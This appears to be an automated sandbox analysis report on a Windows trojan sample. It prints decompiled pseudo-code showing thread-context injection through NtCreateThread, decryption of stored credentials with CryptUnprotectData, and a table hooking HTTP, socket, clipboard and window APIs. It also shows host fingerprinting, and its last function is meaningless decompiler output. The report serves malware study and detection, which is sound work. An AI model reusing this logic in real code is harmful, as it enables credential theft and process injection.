    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
    • Instruction ID: 3bd642362b4a45eca11371647224929ce2bedc2991cbd4bc275d8ffd3f86f6df
    • Opcode Fuzzy Hash: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
    • Instruction Fuzzy Hash: 9BF0A0322011017AE2211F39DC0DA6F39AAABC17B0B044729F866E61F0E73888C28528
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412245(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
    				void _v28;
    				long _v32;
    				intOrPtr _v40;
    				void* __edi;
    				void* _t21;
    				void* _t27;
    				signed int _t30;
    				void* _t34;
    				void* _t35;
    				void* _t38;
    				void* _t40;
    				void* _t42;
    
    				_t42 = __esi;
    				_t38 = __edx;
    				_t35 = __ecx;
    				_t21 = E004068C0();
    				_t40 = _a16;
    				if(_t21 != 0 && NtQueryInformationProcess(_t40, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E00417A96(_v28) == 0)) {
    					_t34 = E004066F1(_t35, _t38, _v28);
    					_t51 = _t34;
    					if(_t34 != 0) {
    						_t27 = E004067D5(_t35, _t40, _t42, _t51, _t34, 0);
    						if(_t27 != 0) {
    							_t30 = _t27 -  *0x422954 + E00406F49;
    							if(( *0x422940 & 0x00000010) != 0) {
    								_t30 = _t30 ^  *(_a24 + 0xb0);
    							}
    							 *(_a24 + 0xb0) = _t30;
    						}
    						CloseHandle(_t34);
    					}
    				}
    				return NtCreateThread(_a4, _a8, _a12, _t40, _a20, _a24, _a28, _a32);
    			}

    APIs
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0041226B
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 004122D2
      • Part of subcall function 00417A96: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00417AA3
      • Part of subcall function 00417A96: Thread32First.KERNEL32 ref: 00417ABE
      • Part of subcall function 00417A96: CloseHandle.KERNEL32(00000000), ref: 00417ADF
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 004122EE
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
    • String ID:
    • API String ID: 3154080929-0
    • Opcode ID: 31ce1dd6b7178b899c88e388dc009fc53f4911cc931f1d66334fc94b73740aa5
    • Instruction ID: d6612e2950bc0096cfb8227e5cf1b60d3893563ff2f58f63ccb2b4a81d6033e9
    • Opcode Fuzzy Hash: 31ce1dd6b7178b899c88e388dc009fc53f4911cc931f1d66334fc94b73740aa5
    • Instruction Fuzzy Hash: 7311A271200309ABDB119F50CD44BEF3BA9BF48304F04066AFD44A51E1D7B9D9B6DB1A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 0041984A
    • bind.WS2_32(00000000,00000017,-0000001D), ref: 0041986A
    • closesocket.WS2_32(00000000), ref: 00419875
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
    • Instruction ID: 50f54785d9e9cd4598c800217dd09d28a49b5351715228102a43b2cea7cc6a3e
    • Opcode Fuzzy Hash: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
    • Instruction Fuzzy Hash: E7E0DF3220010076E2202B3EAD0EA6F25A99BC67B0B180724F872D71F2E738C8C28124
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00412C9A(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v5;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v44;
    				signed int _v48;
    				void* _v52;
    				char _v56;
    				char _v72;
    				void* _v96;
    				char _v196;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				signed int _t65;
    				void* _t66;
    				void* _t68;
    				char* _t70;
    				intOrPtr _t77;
    				signed int* _t82;
    				intOrPtr _t95;
    				void* _t97;
    				signed int _t100;
    				void* _t107;
    				void* _t109;
    				intOrPtr _t115;
    				char* _t117;
    				void* _t129;
    
    				_t121 = __eflags;
    				_t115 = _a4;
    				_push(_t115);
    				_t92 = __eax;
    				_t48 = E00412C47(__eax, __eflags, 0x4c);
    				_push(_t115);
    				_v20 = _t48;
    				_t50 = E00412C47(_t92, _t121, 0x4f);
    				_push(_t115);
    				_v24 = _t50;
    				_t52 = E00412C47(_t92, _t121, 0x50);
    				_push(_t115);
    				_v28 = _t52;
    				_t54 = E00412C47(_t92, _t121, 0x4d);
    				_push(_t115);
    				_v36 = _t54;
    				_v12 = E00412C47(_t92, _t121, 0x4e);
    				_v5 = _v20 != 0;
    				if(_v5 != 0) {
    					_t95 = _v12;
    					_t65 = E00416F70(_t95);
    					if(_t95 != 0 && _t65 > 1) {
    						_t100 = _t65 & 0x80000001;
    						if(_t100 < 0) {
    							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
    						}
    						if(_t129 == 0) {
    							asm("cdq");
    							_v48 = _t65 - _t107 >> 1;
    							_t77 = E004163F1(_t65 - _t107 >> 1);
    							_v44 = _t77;
    							if(_t77 != 0) {
    								if(E00416C5E(_v12, _t77) != 0) {
    									_t82 =  &_v48;
    									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
    									if(_t82 == 1) {
    										_v16 = E004167DD(_v52);
    										LocalFree(_v52);
    									}
    								}
    								E00416421(_v44);
    							}
    						}
    					}
    					_t66 = 0x4b;
    					E004159A4(_t66,  &_v196);
    					_t117 =  &_v72;
    					_t68 = 0x54;
    					E004159A4(_t68, _t117);
    					_t70 = 0x4036b4;
    					_t109 =  ==  ? 0x4036b4 : _v16;
    					_t97 =  ==  ? 0x4036b4 : _v36;
    					_t135 = _v32;
    					if(_v32 != 0) {
    						_t70 = _t117;
    					}
    					_push(_t109);
    					_push(_t97);
    					_push(_t70);
    					_push(_v20);
    					E004171A2(_a12, E00416F70( *_a12),  *_a12, _t135,  &_v196, _a4);
    					_t56 = E00416421(_v16);
    				}
    				E0041C9BD(E0041C9BD(E0041C9BD(E0041C9BD(E0041C9BD(_t56, _v20), _v24), _v28), _v36), _v12);
    				return _v5;
    			}

    APIs
    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00412D91
    • LocalFree.KERNEL32(?,?,?,?), ref: 00412DAD
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$CryptDataHeapLocalUnprotect
    • String ID:
    • API String ID: 2231100991-0
    • Opcode ID: 6e3b09b6c20f672fd660acc0adca1bdca9c6b6da13eaf4a00875a35b7012c7c6
    • Instruction ID: c054a54b54a6d90d6bc300701da38334cc33c06bf1b2db13ebf5a9cf321ad368
    • Opcode Fuzzy Hash: 6e3b09b6c20f672fd660acc0adca1bdca9c6b6da13eaf4a00875a35b7012c7c6
    • Instruction Fuzzy Hash: E8519E71E00219AADF10AFF5DE91AEEBB75EF44318F10442BF604F7251D6788991CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0040745C(char* __esi) {
    				void* _v40;
    				short _v46;
    				signed char _v48;
    				struct _OSVERSIONINFOW _v324;
    				void* _t13;
    				int _t16;
    				signed int _t20;
    				short _t24;
    				char* _t25;
    
    				_t25 = __esi;
    				E004164D4(_t13, __esi, 0, 6);
    				_v324.dwOSVersionInfoSize = 0x11c;
    				_t16 = GetVersionExW( &_v324);
    				if(_t16 != 0) {
    					__imp__GetNativeSystemInfo( &_v40);
    					 *__esi = E00407386();
    					if(_v48 > 0xff || _v46 != 0) {
    						_t20 = 0;
    					} else {
    						_t20 = _v48 & 0x000000ff;
    					}
    					 *(_t25 + 1) = _t20;
    					asm("sbb eax, eax");
    					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
    					_t24 = _v40;
    					 *((short*)(_t25 + 4)) = _t24;
    					return _t24;
    				}
    				return _t16;
    			}

    APIs
    • GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 00407480
    • GetNativeSystemInfo.KERNEL32(?), ref: 0040748E
      • Part of subcall function 00407386: GetVersionExW.KERNEL32(?,74B04EE0), ref: 004073A5
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Version$InfoNativeSystem
    • String ID:
    • API String ID: 2518960133-0
    • Opcode ID: e4fe75ed65bb1c34d3a690e9d664eb20c49ca4a26a7314133493b515d04e7619
    • Instruction ID: fac4558aa0888636ac7ccffb873d5e3a80fd072835e389f846cf024d48c216a8
    • Opcode Fuzzy Hash: e4fe75ed65bb1c34d3a690e9d664eb20c49ca4a26a7314133493b515d04e7619
    • Instruction Fuzzy Hash: 8E014435D052459ADB319FA5C9017DEB7F4AF08700F0044BAE555F2291E67CE984CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0040C056(signed short* __eax, void* __ecx) {
    				signed int _v8;
    				void* __esi;
    				signed int* _t7;
    				void* _t8;
    				signed short* _t9;
    				signed int _t10;
    				signed int _t13;
    				signed short _t14;
    				void* _t15;
    
    				_t16 = __eax;
    				_t7 =  &_v8;
    				_v8 = 0x104;
    				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
    				if(_t7 == 0) {
    					L8:
    					_t8 = 6;
    					_t9 = E004159A4(_t8, _t16);
    				} else {
    					_t10 = _v8;
    					if(_t10 == 0) {
    						goto L8;
    					} else {
    						 *((short*)(__eax + _t10 * 2)) = 0;
    						_t9 = __eax;
    						if( *((intOrPtr*)(__eax)) != 0) {
    							do {
    								_t13 =  *_t9 & 0x0000ffff;
    								if(_t13 == 0x2f || _t13 == 0x5c) {
    									_t14 = 0x7c;
    									 *_t9 = _t14;
    								}
    								_t9 =  &(_t9[1]);
    							} while ( *_t9 != 0);
    						}
    					}
    				}
    				return _t9;
    			}

    APIs
    • GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C1AD,?,?,00000000), ref: 0040C06B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: NameUser
    • String ID:
    • API String ID: 2645101109-0
    • Opcode ID: 49448662f5cee08f435f2d32c3e6798251ee09afad8dc8958ab54f67f37ded3f
    • Instruction ID: 7e83087d8dbcc8e795a4edbfc31adb0d86264b2afadb28f648784f0ec73abedf
    • Opcode Fuzzy Hash: 49448662f5cee08f435f2d32c3e6798251ee09afad8dc8958ab54f67f37ded3f
    • Instruction Fuzzy Hash: C5F02461610200EADB346BA8C882BBB73E8EF45710F10016BF446EB2D0E6BD8D80C35D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0041201E(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr* _t8;
    				intOrPtr _t10;
    				intOrPtr _t12;
    
    				_t8 = E004068C0();
    				_t12 = _a8;
    				if(_t8 == 0 || _t12 == 0) {
    					L5:
    					__imp__InternetReadFileExA(_a4, _t12, _a12, _a16);
    					return _t8;
    				}
    				_t11 =  *((intOrPtr*)(_t12 + 0x14));
    				if( *((intOrPtr*)(_t12 + 0x14)) == 0) {
    					goto L5;
    				}
    				_t8 = _t12 + 0x18;
    				_t10 =  *_t8;
    				_t16 = _t10;
    				if(_t10 == 0) {
    					goto L5;
    				}
    				_t8 = E00411897(_t16,  &_a4, _t11, _t10, _t8);
    				if(_t8 == 0xffffffff) {
    					goto L5;
    				}
    				return _t8;
    			}

    APIs
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • InternetReadFileExA.WININET(?,?,?,?), ref: 0041205D
      • Part of subcall function 00411897: EnterCriticalSection.KERNEL32(004230DC), ref: 004118A8
      • Part of subcall function 00411897: LeaveCriticalSection.KERNEL32(004230DC), ref: 00411A6B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterFileInternetLeaveObjectReadSingleWait
    • String ID:
    • API String ID: 4141673382-0
    • Opcode ID: c151629cedfe721673f4592969990c3722af4ec08587117ed401869b71da25a4
    • Instruction ID: 584aace8322762d7bf798a7c032b6204f663464421d4264b0d88cf7831a16984
    • Opcode Fuzzy Hash: c151629cedfe721673f4592969990c3722af4ec08587117ed401869b71da25a4
    • Instruction Fuzzy Hash: 28F08231501209ABCF21AF51D900DEB3B69AE46760B04861ABA1597250C375E9A5C7A4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041654B() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t11;
    				void* _t13;
    
    				_t11 = _t13 - 0x78;
    				_t7 = GetTimeZoneInformation(_t11 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t11 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t11 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 0041655A
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 1cbade870f55b3700e2d0feb74f2654927f07bd44c7d44675a4197fdf32d153d
    • Instruction ID: 2365bd53fbd5c19db837ec19cf014adb8651a0e6401fa952a326ae261bede667
    • Opcode Fuzzy Hash: 1cbade870f55b3700e2d0feb74f2654927f07bd44c7d44675a4197fdf32d153d
    • Instruction Fuzzy Hash: 85E08631A04108DBDB20DBA4FE459DD77F6E714308F610412E442E6154D228D9868A0A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E004098BE() {
    				void* __ebx;
    				intOrPtr _t1;
    				intOrPtr _t2;
    				signed int _t55;
    				void* _t57;
    				void* _t58;
    
    				_t1 =  *0x422964;
    				if(_t1 == 0) {
    					_t1 =  *0x422960;
    					 *0x422024 = E00412245;
    				} else {
    					 *0x422024 = E004122FC;
    				}
    				 *0x422020 = _t1;
    				_t2 =  *0x422970; // 0x77e27840
    				 *0x422030 = _t2;
    				 *0x422040 = GetFileAttributesExW;
    				 *0x422050 = HttpSendRequestW;
    				 *0x422060 = HttpSendRequestA;
    				 *0x422070 = HttpSendRequestExW;
    				 *0x422080 = HttpSendRequestExA;
    				 *0x422090 = InternetCloseHandle;
    				 *0x4220a0 = InternetReadFile;
    				 *0x4220b0 = __imp__InternetReadFileExA;
    				 *0x4220c0 = InternetQueryDataAvailable;
    				 *0x4220d0 = HttpQueryInfoA;
    				 *0x4220e0 = __imp__#3;
    				 *0x4220f0 = __imp__#19;
    				 *0x422100 = __imp__WSASend;
    				 *0x422110 = OpenInputDesktop;
    				 *0x422120 = SwitchDesktop;
    				 *0x422130 = DefWindowProcW;
    				 *0x422140 = DefWindowProcA;
    				 *0x422150 = DefDlgProcW;
    				 *0x422160 = DefDlgProcA;
    				 *0x422170 = DefFrameProcW;
    				 *0x422180 = DefFrameProcA;
    				 *0x422190 = DefMDIChildProcW;
    				 *0x4221a0 = DefMDIChildProcA;
    				 *0x4221b0 = CallWindowProcW;
    				 *0x4221c0 = CallWindowProcA;
    				 *0x4221d0 = RegisterClassW;
    				 *0x4221e0 = RegisterClassA;
    				 *0x4221f0 = RegisterClassExW;
    				 *0x422200 = RegisterClassExA;
    				 *0x422210 = BeginPaint;
    				 *0x422220 = EndPaint;
    				 *0x422230 = GetDCEx;
    				 *0x422240 = GetDC;
    				 *0x422250 = GetWindowDC;
    				 *0x422260 = ReleaseDC;
    				 *0x422270 = GetUpdateRect;
    				 *0x422280 = GetUpdateRgn;
    				 *0x422290 = GetMessagePos;
    				 *0x4222a0 = GetCursorPos;
    				 *0x4222b0 = SetCursorPos;
    				 *0x4222c0 = SetCapture;
    				 *0x4222d0 = ReleaseCapture;
    				 *0x4222e0 = GetCapture;
    				 *0x4222f0 = GetMessageW;
    				 *0x422300 = GetMessageA;
    				 *0x422310 = PeekMessageW;
    				 *0x422320 = PeekMessageA;
    				 *0x422330 = TranslateMessage;
    				_push(0x422020);
    				 *0x422340 = GetClipboardData;
    				_t55 = 0x34;
    				 *0x422350 = __imp__PFXImportCertStore;
    				return E0040982D(_t55, _t57, _t58);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocVirtual
    • String ID: @xw
    • API String ID: 4275171209-2821512424
    • Opcode ID: 3d721b67e893173ae914b4e9d23c648a04975ec7ae3341ad47db7d82f726d3cd
    • Instruction ID: 5e99fbbc8a0100d12aca69e73175c33ca87e2bf8f5f0399f13bd19a989f0eb0a
    • Opcode Fuzzy Hash: 3d721b67e893173ae914b4e9d23c648a04975ec7ae3341ad47db7d82f726d3cd
    • Instruction Fuzzy Hash: C261B8B8A00205EFD3A5CF68EF80A107BE1B34C354380427AE919E7731E7B5A956CB1C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004175D2() {
    				signed int _t23;
    				signed int _t59;
    				signed int* _t63;
    				signed int _t64;
    
    				_t23 =  *0x423f3c;
    				if(_t23 >= 0x270) {
    					_t64 = 0;
    					do {
    						_t59 = _t64;
    						_t64 = _t64 + 1;
    						0x423570[_t59] = (( *(0x423574 + _t59 * 4) ^ 0x423570[_t59]) & 0x7fffffff ^ 0x423570[_t59]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x423574 + _t59 * 4) ^ 0x423570[_t59]) & 0x7fffffff ^ 0x423570[_t59]) & 0x00000001) * 4) ^  *(0x423ba4 + _t59 * 4);
    					} while (_t64 < 0xe3);
    					if(_t64 < 0x26f) {
    						_t63 =  &(0x423570[_t64]);
    						do {
    							 *_t63 =  *(0x4223a0 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
    							_t63 =  &(_t63[1]);
    						} while (_t63 < 0x423f2c);
    					}
    					 *0x423f2c = (( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) >> 0x00000001 ^  *(0x4223a0 + ((( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) & 0x00000001) * 4) ^  *0x423ba0;
    					_t23 = 0;
    				}
    				 *0x423f3c = _t23 + 1;
    				return (0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: ,?B
    • API String ID: 0-236612630
    • Opcode ID: 6e7ed6086db159d592b1e687204cfc3c8707564ea43853b1faf2714dc84b2c69
    • Instruction ID: a12bba72c267ff3691ff412c9d742f4edfeb63e5ad7961b672c2d0960eebf0bf
    • Opcode Fuzzy Hash: 6e7ed6086db159d592b1e687204cfc3c8707564ea43853b1faf2714dc84b2c69
    • Instruction Fuzzy Hash: 5C216A327204009BD728DF3DEC55A4537F2E78931539A847DD519C32A0EA3DEA438B4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E004021F3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
    				intOrPtr* _t95;
    				void* _t96;
    				void* _t98;
    				intOrPtr* _t100;
    				void* _t102;
    				intOrPtr* _t104;
    				signed char _t111;
    				signed char _t112;
    				signed char _t113;
    				signed char _t114;
    				signed char _t127;
    				signed char _t128;
    				signed char _t132;
    				signed char _t133;
    				void* _t165;
    				void* _t168;
    				intOrPtr* _t169;
    				void* _t170;
    				void* _t171;
    				intOrPtr* _t172;
    				intOrPtr* _t187;
    				intOrPtr* _t188;
    				void* _t189;
    				intOrPtr* _t191;
    				signed char _t195;
    				intOrPtr* _t205;
    				signed char _t213;
    				signed char _t217;
    				intOrPtr* _t224;
    				intOrPtr* _t225;
    				void* _t226;
    				intOrPtr* _t229;
    				void* _t230;
    				intOrPtr* _t232;
    				intOrPtr* _t233;
    				void* _t236;
    				intOrPtr* _t237;
    				void* _t239;
    				void* _t241;
    				void* _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    				void* _t249;
    				void* _t251;
    				void* _t252;
    				void* _t253;
    				void* _t254;
    
    				_t232 = __esi;
    				_t168 = __ebx;
    				_t205 = __edx + __ecx;
    				 *__eax =  *__eax + __ebx;
    				_t253 = _t252 + __ecx;
    				 *_t205 =  *_t205 + __ebx;
    				 *__esi =  *__esi + __ecx;
    				_t95 = __eax + _t205;
    				 *_t95 =  *_t95 + _t205;
    				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
    				asm("rol byte [ecx], cl");
    				_t224 = __edi + __ecx + 1;
    				_t242 = _t241 + _t205;
    				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
    				_pop(_t96);
    				_t187 = __ecx + _t205 + __ebx;
    				_t5 = __esi + 1;
    				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
    				asm("fild dword [ecx]");
    				if( *_t5 >= 0) {
    					asm("fiadd word [ecx]");
    				}
    				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
    				asm("loopne 0x3");
    				_push(_t242);
    				_t169 = _t168 + _t253;
    				 *_t169 =  *_t169 + _t96;
    				_t243 = _t242 + _t253;
    				 *_t205 =  *_t205 + _t224;
    				_t233 = _t232 + _t253;
    				 *_t224 =  *_t224 + _t96;
    				 *0x1901ea01 =  *0x1901ea01 + _t187;
    				_t254 = _t253 + _t243;
    				 *_t169 =  *_t169 + _t169;
    				_t225 = _t224 + _t243;
    				 *_t225 =  *_t225 + _t187;
    				_t98 = _t96 + _t243 + _t233;
    				 *_t187 =  *_t187 + _t205;
    				_t188 = _t187 + _t233;
    				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
    				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
    				asm("cmc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
    				asm("clc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
    				asm("stc");
    				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
    				asm("sti");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
    				 *_t188 =  *_t188 + 1;
    				asm("arpl [ecx], ax");
    				 *_t188 =  *_t188 + 1;
    				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
    				_t170 = _t169 +  *_t233;
    				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
    				asm("daa");
    				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
    				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
    				_t189 = _t188 +  *_t100;
    				_t102 = _t100 +  *_t100 + _t170;
    				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
    				asm("insb");
    				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
    				_t236 = _t233 + _t100 + _t171 + _t254;
    				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
    				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
    				_t104 = _t102 +  *_t191 + _t225;
    				_t237 = _t236 + _t225;
    				 *0xa3013803 = _t104;
    				asm("movsd");
    				_t246 = _t245 +  *_t104;
    				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
    				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
    				_push(_t225);
    				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
    				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
    				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
    				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
    				asm("rol byte [ebx], cl");
